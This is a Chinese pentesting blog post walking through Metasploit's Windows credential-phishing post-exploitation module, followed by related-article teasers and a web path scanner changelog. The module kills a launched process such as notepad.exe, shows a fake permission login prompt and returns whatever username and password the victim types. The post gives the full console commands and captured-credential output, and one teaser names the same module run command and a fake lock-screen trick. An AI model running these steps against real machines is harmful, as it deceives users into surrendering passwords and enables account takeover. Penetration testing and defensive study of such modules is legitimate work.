Windows Gather User Credentials (phishing)

最新推荐文章于 2022-06-17 16:48:17 发布
最新推荐文章于 2022-06-17 16:48:17 发布
阅读量1k 收藏
点赞数
分类专栏: Pentesting
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nixawk/article/details/43703919
版权

Description:
This module is able to perform a phishing attack on the target by
popping up a loginprompt. When the user fills credentials in the
loginprompt, the credentials will be sent to the attacker. The
module is able to monitor for new processes and popup a loginprompt
when a specific process is starting. Tested on Windows 7.

When notepad.exe is opened in target machine, there will be a login manager window. If you provide the right password, notepad window will appear, or it will continue until you hate it.

msf post(phish_windows_credentials) > show options 

Module options (post/windows/gather/phish_windows_credentials):

   Name         Current Setting                                                                Required  Description
   ----         ---------------                                                                --------  -----------
   DESCRIPTION  {PROCESS_NAME} needs your permissions to start. Please enter user credentials  yes       Message shown in the loginprompt
   PROCESS                                                                                     no        Prompt if a specific process is started by the target. (e.g. calc.exe or specify * for all processes)
   SESSION                                                                                     yes       The session to run this module on.

msf post(phish_windows_credentials) > set SESSION 1
SESSION => 1
msf post(phish_windows_credentials) > set PROCESS notepad.exe
PROCESS => notepad.exe
msf post(phish_windows_credentials) > run

[+] PowerShell is installed.
[*] Monitoring new processes.
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] notepad.exe is already running. Waiting on new instances to start
[*] New process detected: 1040 notepad.exe
[*] Killing the process and starting the popup script. Waiting on the user to fill in his credentials...
[+] #< CLIXML

[+] 

[+] UserName                   Domain                     Password                 
--------                   ------                     --------                 
nfs                        nfs-001

[1].https://forsec.nl/2015/02/windows-credentials-phishing-using-metasploit/
[2].https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/phish_windows_credentials.rb
[3].https://github.com/rapid7/metasploit-framework/blob/master/data/post/powershell/Invoke-LoginPrompt.ps1

Nixawk
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透笔记】Windows密码凭证获取
白菜猪肉炖粉条
12-03 2736
Windows Hash Windows系统使用两种方法对用户的密码进行哈希处理,它们分别是**LAN Manager(LM)哈希和NT LAN Manager(NTLM)**哈希。 LM哈希存在缺陷,所以新版的win不再使用 LM哈希密码最大长度为14,密码长度超过14位使用NTLM哈 希 所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行 一次数学加密函数运算,然后返回一个固定长度的字符串。 现在已经有了更新的NTLMv2以及Kerberos验证体系
Windows10管理credential
Andy的博客
03-10 1346
管理credential
win本地credentials收集
ATpiu的博客
04-08 4278
内网渗透,内网信息收集,win本地credentials收集,DPAPI,masterkey
(二)Amazon AWS IAM(Identity and Access Management)使用:在windows本地生成credentials文件,运行SQS标准队列示例代码
JayXu's Blog
03-10 1450
IAM是使用amazon aws的第一步,也就是你需要在你的账号下面创建多个用户,为每个用户分配不同的策略(policy,也就是权限)。这样你才能在本地有用户对应的credentials(linux、Mac OS:~/.aws/credentialsWindows在对应用户的.aws路径下),有了这个路径,才可以用aws-java-sdk去操作aws的相关服务。 下面是官方给的SQS标准队列...
删除windows凭据,登录网页账号密码
Dontla的博客
05-13 844
控制面板\用户帐户\凭据管理器 这里保存了很多账号密码,如果电脑不用了,记得删除
sgbuf.rar_SCATTER GATHER
最新发布
09-24
Scatter-Gather缓冲区驱动是Linux内核中的一个重要概念,主要用于优化I/O操作,特别是针对块设备和网络传输。在传统的I/O操作中,数据通常从一个单一的内存区域读取或写入到另一个单一的区域,而在Scatter-Gather...
Pytorch高阶OP操作where,gather原理
09-16
本文将重点探讨其中的两个重要操作:`where`和`gather`,它们在处理和操纵张量数据时起着至关重要的作用。 **一、where操作** `torch.where()`是一个条件选择函数,它根据提供的条件`condition`来选择返回`x`或`y`...
Windows TCP 通信学习笔记
09-23
6. **Scatter/Gather I/O (向量化I/O)**: 使用WSARecv和WSASend等函数,允许数据在多个缓冲区之间分散或聚集,简化了发送和接收带有多个部分的消息。 7. **Quality of Service (QoS)**: 允许应用程序指定网络流量的...
书签管理软件 URL Gather v3.1.1
11-08
URL Gather是一款分类保存管理Internet书签、地址的工具。该软件极大简化了收藏网站的繁琐过程,且会分门别类帮您整理好收藏的网址。URL Gather v3.1.1版本特性:配置多个浏览器打开你的
7kbscan-WebPathBrute-master.zip
04-15
7kbscan-WebPathBrute Web路径暴力探测工具
web路径探测工具 7kbscan-WebPathBrute 1.5.8 (集成三字典)
07-16
使用与更新说明 1.5.8 Beta 2018-01-28 一、增加了几个变量 %DomainNoPoint%为当前扫描目标域名去掉. wwwbaiducom %DomainUnderLine%为当前扫描目标域名将.换成下划线www_baidu_com %DomainCenterAndTldUnderLine%为当前扫描目标域名主体与后缀并将.换成下划线baidu_com %LastSubPath%为当前目标url最后一级目录 baidu.com/admin/data/ 则%LastSubPath%为data (注:此变量需要为Url加入/结尾,如未存在子目录则程序自动抛弃此行字典。) 1.5.7 Beta 2018-01-26 一、增加字典变量功能 目标域名为www.baidu.com的话 四个变量 分别是 %Domain% 为当前扫描目标域名www.baidu.com %SubDomain% 为当前扫描目标子域名www %DomainCenter% 为当前扫描目标域名主体baidu %DomainCenterAndTld% 为当前扫描目标域名主体与后缀baidu.com 二、给非head访问增加返回长度功能通过返回长度可有效识别一些通过关键字无法识别的自定义404页面 三、修复若干bug并取消了启动弹框 1.5.6 Beta 2017-08-30 一、修复关闭后进程不推出的问题 二、修复cookie支持兼容问题 1.5.5 Beta 2017-08-19 一、修改开始按钮的显示状态为动态(根据线程状态判断) 二、恢复暂停按钮 1.5.4 Beta 2017-08-14 一、接受建议调整功能可以自由输入http头不止支持useragent和cookie 二、接受建议调整界面自定义404的输入框挪到左侧 三、接受建议取消暂停按钮将开始和停止按钮合并 1.5.3 Beta 2017-08-09 一、接受建议让结果表格自动下滑 二、接受建议修改对延时扫描时间的小数支持 三、修复多URL扫描的多处bug 1.5.2 Beta 2017-08-06 一、接受建议加入cookie功能 二、接受建议修改对URL的处理方法去掉多余的’/’ 三、对3xx结果显示跳转后地址http://www.xxx. xxx/admin/index.php ——–> login_redir.php 1.5.1 Beta 2017-08-05 一、修改若干细节 1.5 Alpha 2017-07-28 一、修复延时扫描处多个bug 二、优化线程 三、修复从快捷方式启动后都取字典失败的问题 四、扫描前URL编码解决部分误报问题 1.4 至安全学员内测版2017-07-21 一、修改最大并发连接为100 二、对输入Url进行智能处理获取最后一个’/’的目录进行扫描 三、增加工作线程数显示控制停止后开始前的线程是否全部退出检查 1.3 Alpha 2017-07-20 一、增加停止按钮 二、增加暂停按钮 三、拼接字典时自动根据字典类型增加/ 符号使扫描结果更精准 1.2 Alpha 2017-07-18 一、精确扫描结果识别跳转页面 二、对输入参数进行判断 1.1 Alpha 2017-07-18 一、增加列表内容不同常用状态码使用不同颜色的功能绿色为200 红色为403 二、增加点击列头后对列表内容排序的功能 三、增加右键导出结果功能 四、美化部分文本内容 五、点击开始会自动重置工具方便重复使用不必重新打开 六、增加自选加载字典模式可多选! 1.0 Alpha 2017-07-17 秉承着为人民服务的想法还有就是Windows下我确实没有什么功能比较全又稳定的此类工具了此前用过破壳扫描器和dirburte 都不稳定经常崩,御剑虽好但是缺少很多小功能。 不扯这些了介绍一下功能吧 一、先说说并发线程数吧,虽然默认是20 但是加大也无妨看你自己的各个参数设置和机器网络等配置了。 二、超时时间自己视情况而定也不必多介绍了。 三、这个随机xff头和xr头套用百度上一段话能懂得自然懂得不懂得也无所谓很少能碰见需要用到的这种情况勾选后每次访问都会随机生成这两个IP值如果线程开的大可能比较耗cpu。 1、X-Forwarded-For是用于记录代理信息的,每经过一级代理X-Forwarded-For是用于记录代理信息的,每经过一级代理(匿名代理除外),代理服务器都会把这次请求的来源IP追加在X-Forwarded-For中,来自4.4.4.4的一个请求,header包含这样一行X-Forwarded-For: 1.1.1.1, 2.2.2.2, 3
Openstack学习笔记(十)-Keystone学习笔记(一)
Forlogenの解忧杂货铺
04-12 6240
一、Keystone学习笔记1、背景1.1 背景简述随着云计算的愈发火热,参与到其中的人越来越多,不管是政府部门还是世界的各家大小公司,纷纷参与到了这股浪潮中。而用户作为消费者选择云平台,主要是因为云计算相对于传统的方式可以带给自己费用上的节省,能获得快捷服务的体验,越来越多的用户选择云产品,意味着将会有越来越多的数据存储在“云端“,安全性如何保证无疑会成为为摆在云服务提供商以及终端用户面前一个非常
H5-------------- script 标签的 crossorigin 属性有何作用
热门推荐
江木
01-31 2万+
先来看下使用: src="https://code.jquery.com/jquery-3.2.1.slim.min.js"     integrity="shdsfaafa/342/42342/werfadf/GpGFF93hXpG5KkN"     crossorigin="anonymous"> 看起来比以前的写法复杂好多-----------多了一个 int
Git首次推送一直报错:Logon failed, use ctrl+c to cancel basic credential prompt.
ZhaZha__Hui的博客
06-17 744
报错信息: Logon failed, use ctrl+c to cancel basic credential prompt. 提交时有多次弹窗 第一次: 第二次弹窗 第三次弹窗 第一次弹窗:填写我们的github账号密码 第二第三次弹窗:填写 生成token
Windows Credentials Editor v1.2 (WCE)在***过程中的关键作用
weixin_34372728的博客
08-28 288
昨天G0t3n聊天,G0t3n说起Windows Credentials Editor v1.2 (WCE)这款软件,除了抓HASH,还能注入HASH***,提升为域管理员权限。 参数如下: -l List logon sessions and NTLM credentials (default). -s...
曲线获取windows明文凭证的几种方式
Shanfenglan's blog
06-23 391
文章目录1. 前言2. 利用msf的模块3. 伪造锁屏界面 1. 前言 我们拿到一个shell后,利用一些有趣的方式直接获取明文密码。 2. 利用msf的模块 拿到shell后直接输入run post/windows/gather/phish_windows_credentials,对方电脑上会出现一个弹框,如果对方在弹框中输入密码,我们即可获得明文密码,此操作不需要绕过UAC: 3. 伪造锁屏界面 上传一个伪造锁屏页面的程序并启动,等待对方输入密码: 其实多多少少有些瑕疵,但如果当事人安全意识不强的
遇到问题---mongodb--Usage of 'UserCredentials' with 'MongoClient' is no longer supported
直到世界的尽头
11-08 2025
转载请注明出处:遇到问题—mongodb–Usage of ‘UserCredentials’ with ‘MongoClient’ is no longer supported 遇到问题 SpringMVC的项目中使用spring-data-mongodb驱动包进行读写mongodb。 包的pom.xml如下 &amp;lt;dependency&amp;gt; &amp;lt;groupId&amp;gt;org....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值